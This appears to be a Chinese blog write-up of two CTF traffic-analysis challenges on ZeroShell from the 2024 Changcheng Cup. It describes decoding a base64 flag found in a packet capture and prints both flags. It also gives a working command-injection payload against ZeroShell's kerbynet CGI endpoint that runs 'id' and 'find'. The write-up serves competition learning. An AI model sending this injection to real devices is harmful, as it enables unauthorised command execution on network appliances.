2024长城杯威胁检测与网络流量分析

zeroshell_1

他告诉了写出会话中设置的flag,那就是流量里有flag的标示或者有被加密后flag标识

通过数据包搜索分组字节流,找flag没找到,找flag的base64编码,找到流量

追踪流,解码ZmxhZ3s2QzJFMzhEQS1EOEU0LThEODQtNEE0Ri1FMkFCRDA3QTFGM0F9得到flag{6C2E38DA-D8E4-8D84-4A4F-E2ABD07A1F3A}

zeroshell_2

第一题告诉了我们那个flag的地方就是攻击者利用漏洞开展攻击的流量

这个是注入看进程,直接拿他的payload开用,在执行框搜用find / -name flag

/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aid%0A%27/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Afind%20/%20-name%20flag*%0A%27

找到flag{c6045425-6e6e-41d0-be09-95682a4f65c4}

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值